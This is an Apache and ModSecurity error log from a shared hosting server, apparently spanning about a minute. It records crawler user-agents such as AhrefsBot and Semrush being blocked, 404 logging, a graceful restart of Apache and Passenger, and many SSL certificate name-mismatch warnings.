[Tue May 26 17:00:24.723469 2026] [security2:error] [pid 839808:tid 839970] [client 51.75.236.136:16354] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahWEUJqtwAfohijxAqhwJwABKDU"]
[Tue May 26 17:00:25.081309 2026] [security2:error] [pid 839808:tid 839855] [remote 142.44.233.176:20088] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "osmsi.org.in"] [uri "/"] [unique_id "ahWEUZqtwAfohijxAqhwLgABZSw"]
[Tue May 26 17:00:25.081543 2026] [security2:error] [pid 839808:tid 840031] [client 142.44.233.176:20088] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "osmsi.org.in"] [uri "/"] [unique_id "ahWEUZqtwAfohijxAqhwLgABZSw"]
[Tue May 26 17:00:25.119801 2026] [security2:error] [pid 839808:tid 840052] [client 114.119.139.251:27449] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWEUZqtwAfohijxAqhwLwAAAXo"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-11-23
[Tue May 26 17:00:25.192556 2026] [security2:error] [pid 839808:tid 839962] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEUJqtwAfohijxAqhwFwAAASA"]
[Tue May 26 17:00:26.219088 2026] [security2:error] [pid 839808:tid 839821] [remote 54.39.89.177:48090] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rainadelproperties.com"] [uri "/"] [unique_id "ahWEUpqtwAfohijxAqhwQAABFQo"]
[Tue May 26 17:00:26.219292 2026] [security2:error] [pid 839808:tid 839951] [client 54.39.89.177:48090] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rainadelproperties.com"] [uri "/"] [unique_id "ahWEUpqtwAfohijxAqhwQAABFQo"]
[Tue May 26 17:00:28.054189 2026] [security2:error] [pid 839808:tid 840015] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEUpqtwAfohijxAqhwSwAAAVU"]
[Tue May 26 17:00:29.674825 2026] [security2:error] [pid 839808:tid 839951] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEU5qtwAfohijxAqhweAAAARU"]
[Tue May 26 17:00:31.969106 2026] [security2:error] [pid 839808:tid 839998] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEVpqtwAfohijxAqhwrQAAAUQ"]
[Tue May 26 17:00:33.545110 2026] [security2:error] [pid 839808:tid 839955] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEWJqtwAfohijxAqhw8AAAARk"]
[Tue May 26 17:00:35.434341 2026] [security2:error] [pid 839808:tid 840051] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEWpqtwAfohijxAqhxEgAAAXk"]
[Tue May 26 17:00:36.966173 2026] [security2:error] [pid 839808:tid 839984] [client 76.33.113.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEW5qtwAfohijxAqhxMQAAATY"]
[Tue May 26 17:00:38.113132 2026] [security2:error] [pid 839808:tid 840029] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEXJqtwAfohijxAqhxSAAAAWM"]
[Tue May 26 17:00:39.603939 2026] [security2:error] [pid 839808:tid 840030] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEXpqtwAfohijxAqhxZAAAAWQ"]
[Tue May 26 17:00:40.892968 2026] [security2:error] [pid 839808:tid 839993] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEX5qtwAfohijxAqhxfAAAAT8"]
[Tue May 26 17:00:43.321449 2026] [security2:error] [pid 839808:tid 839982] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEYpqtwAfohijxAqhxtwAAATQ"]
[Tue May 26 17:00:44.961486 2026] [security2:error] [pid 839808:tid 839970] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEY5qtwAfohijxAqhx1gAAASg"]
[Tue May 26 17:00:47.139988 2026] [security2:error] [pid 839808:tid 840017] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEZZqtwAfohijxAqhyBgAAAVc"]
[Tue May 26 17:00:48.608019 2026] [security2:error] [pid 839808:tid 839949] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEZ5qtwAfohijxAqhyIwAAARM"]
[Tue May 26 17:00:51.025170 2026] [security2:error] [pid 839808:tid 840027] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEaZqtwAfohijxAqhyZAAAAWE"]
[Tue May 26 17:00:52.859577 2026] [security2:error] [pid 839808:tid 839957] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEa5qtwAfohijxAqhyhwAAARs"]
[Tue May 26 17:00:54.910806 2026] [security2:error] [pid 839808:tid 840033] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEbZqtwAfohijxAqhytAAAAWc"]
[Tue May 26 17:00:56.151868 2026] [security2:error] [pid 839808:tid 840052] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEb5qtwAfohijxAqhy1wAAAXo"]
[Tue May 26 17:00:56.579386 2026] [security2:error] [pid 839808:tid 840024] [client 114.119.157.37:54837] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWEcJqtwAfohijxAqhzFQAAAV4"], referer: http://haddingtonwines.com/cart?remove_item=1f187c8bc462403c4646ab271007edf4
[Tue May 26 17:00:58.286378 2026] [security2:error] [pid 839808:tid 839946] [client 40.124.172.38:52576] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.199.245"] [uri "/index.cgi"] [unique_id "ahWEcpqtwAfohijxAqhzNwAAARA"]
[Tue May 26 17:00:58.730405 2026] [security2:error] [pid 839808:tid 840045] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEcZqtwAfohijxAqhzLwAAAXM"]
[Tue May 26 17:00:58.999176 2026] [security2:error] [pid 839808:tid 840047] [client 85.208.96.206:64248] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-16th/day/2024-07-23/"] [unique_id "ahWEcpqtwAfohijxAqhzRAAAAXU"]
[Tue May 26 17:00:58.999373 2026] [security2:error] [pid 839808:tid 840047] [client 85.208.96.206:64248] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-16th/day/2024-07-23/"] [unique_id "ahWEcpqtwAfohijxAqhzRAAAAXU"]
[Tue May 26 17:00:59.797836 2026] [mpm_event:notice] [pid 333123:tid 333123] AH00493: SIGUSR1 received.  Doing graceful restart

[ N 2026-05-26 17:00:59.8153 448918/T8 age/Cor/CoreMain.cpp:671 ]: Signal received. Gracefully shutting down... (send signal 2 more time(s) to force shutdown)
[ N 2026-05-26 17:00:59.8154 448918/T1 age/Cor/CoreMain.cpp:1246 ]: Received command to shutdown gracefully. Waiting until all clients have disconnected...
[ N 2026-05-26 17:00:59.8154 448918/T8 Ser/Server.h:902 ]: [ServerThr.1] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8154 448918/T8 Ser/Server.h:558 ]: [ServerThr.1] Shutdown finished
[ N 2026-05-26 17:00:59.8154 448918/Tj Ser/Server.h:902 ]: [ServerThr.6] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tj Ser/Server.h:558 ]: [ServerThr.6] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Tc Ser/Server.h:902 ]: [ServerThr.3] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tp Ser/Server.h:902 ]: [ServerThr.9] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tk Ser/Server.h:902 ]: [ServerThr.7] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Ta Ser/Server.h:902 ]: [ServerThr.2] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tk Ser/Server.h:558 ]: [ServerThr.7] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Tf Ser/Server.h:902 ]: [ServerThr.4] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tc Ser/Server.h:558 ]: [ServerThr.3] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Tp Ser/Server.h:558 ]: [ServerThr.9] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Tw Ser/Server.h:902 ]: [ServerThr.13] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Ta Ser/Server.h:558 ]: [ServerThr.2] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Tn Ser/Server.h:902 ]: [ServerThr.8] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/T10 Ser/Server.h:902 ]: [ServerThr.15] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tf Ser/Server.h:558 ]: [ServerThr.4] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Ts Ser/Server.h:902 ]: [ServerThr.11] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8156 448918/Ty Ser/Server.h:902 ]: [ServerThr.14] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8155 448918/Tw Ser/Server.h:558 ]: [ServerThr.13] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/Tn Ser/Server.h:558 ]: [ServerThr.8] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/T10 Ser/Server.h:558 ]: [ServerThr.15] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/Ts Ser/Server.h:558 ]: [ServerThr.11] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/Ty Ser/Server.h:558 ]: [ServerThr.14] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/T12 Ser/Server.h:902 ]: [ServerThr.16] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8156 448918/T12 Ser/Server.h:558 ]: [ServerThr.16] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/T14 Ser/Server.h:902 ]: [ApiServer] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8156 448918/Tu Ser/Server.h:902 ]: [ServerThr.12] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8156 448918/T14 Ser/Server.h:558 ]: [ApiServer] Shutdown finished
[ N 2026-05-26 17:00:59.8156 448918/Tu Ser/Server.h:558 ]: [ServerThr.12] Shutdown finished
[ N 2026-05-26 17:00:59.8157 448918/Tq Ser/Server.h:902 ]: [ServerThr.10] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8157 448918/Tq Ser/Server.h:558 ]: [ServerThr.10] Shutdown finished
[ N 2026-05-26 17:00:59.8155 448918/Tg Ser/Server.h:902 ]: [ServerThr.5] Freed 0 spare client objects
[ N 2026-05-26 17:00:59.8157 448918/Tg Ser/Server.h:558 ]: [ServerThr.5] Shutdown finished
[Tue May 26 17:01:00.448380 2026] [security2:error] [pid 839808:tid 839940] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEc5qtwAfohijxAqhzVwAAAQo"]
[Tue May 26 17:01:00.448423 2026] [security2:error] [pid 839808:tid 839940] [client 57.141.2.17:0] ModSecurity: Audit log: Failed to lock global mutex: Invalid argument [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEc5qtwAfohijxAqhzVwAAAQo"]
[ N 2026-05-26 17:01:00.6854 448918/T1 age/Cor/CoreMain.cpp:1325 ]: Passenger core shutdown finished
[Tue May 26 17:01:00.847074 2026] [:notice] [pid 448910:tid 448910] [host root@md-74.webhostbox.net] mod_lsapi:  Selfstarter 448910 stopped
[Tue May 26 17:01:03.135462 2026] [lsapi:notice] [pid 333123:tid 333123] mod_lsapi:  version 1.1-92
[Tue May 26 17:01:03.137650 2026] [:notice] [pid 851587:tid 851587] [host root@md-74.webhostbox.net] mod_lsapi:  Selfstarter 851587 started
[Tue May 26 17:01:03.157290 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: earthone.me.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.175708 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: arborvitae.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.176347 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cargo-pulse.info.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.184438 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: vobre.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.195958 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dezkapro.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.196267 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: bld4u.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.196563 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: eco-green.com.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.199673 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.199987 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 1earth.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.200600 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: wildcatc.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.200884 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.201439 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: parjanya.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.201748 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopykaapi.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.202057 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopycoffee.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.202330 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarinienergy.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.202885 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: hassantourism.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.203156 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rohiniventures.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.203491 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: adishankara.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.204077 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: actindiamovement.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.206158 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.206462 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: directi.con:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.206739 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: carpetlive.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.208113 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.230370 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubbanquet.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.230696 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubmembership.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.235013 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rbi-cin.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.235876 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: jbrainit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.236186 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: phpridles.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.237033 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: updates9ja.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.237356 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: lookqueenny.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.237693 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 9jareporter.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.237962 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: joshchibuzor.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.238632 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chyamsempire.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.238984 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: builderscorner.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.239315 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: industrialvacumunit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.239609 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chukwuebukafreestyle.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.239965 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ecolinksglobalexpressdelivery.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.240862 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cwh.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.241182 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: senoro.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.241516 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: crystalclear.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.241856 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurante.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.242144 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciagutierrez.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.242759 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurantecom.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.243079 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: autopartesenguadalajara.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.243977 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dprassurance.lk.dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.245922 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: thriveswift.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.246205 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: gauravchhabradigital.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.248046 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciaitconsultores.com.bandita-data.net:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.252722 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: mtm117.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.252988 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: makwasi.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.253257 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: baka-bau.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.253515 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: alpha-bau.net.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.253815 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: t9-security.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.254077 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: north-connect.de.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.260048 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: pdrwebsolutions.cloud:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.266962 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.271266 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: myigfollowers.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.281925 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: localhost:8443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 17:01:03.286969 2026] [qos:notice] [pid 333123:tid 333123] mod_qos(007): calculated MaxClients/MaxRequestWorkers (max connections): 6144, applied limit: 2048 (QS_MaxClients)
[Tue May 26 17:01:03.355072 2026] [http2:info] [pid 333123:tid 333123] AH03090: mod_http2 (v2.0.39, feats=CHPRIO+SHA256+INVHD+DWINS, nghttp2 1.69.0), initializing...
[ N 2026-05-26 17:01:03.3803 851592/T1 age/Wat/WatchdogMain.cpp:1377 ]: Starting Passenger watchdog...
[ N 2026-05-26 17:01:03.3916 851595/T1 age/Cor/CoreMain.cpp:1340 ]: Starting Passenger core...
[ N 2026-05-26 17:01:03.3917 851595/T1 age/Cor/CoreMain.cpp:256 ]: Passenger core running in multi-application mode.
[ N 2026-05-26 17:01:03.4146 851595/T1 age/Cor/CoreMain.cpp:1015 ]: Passenger core online, PID 851595
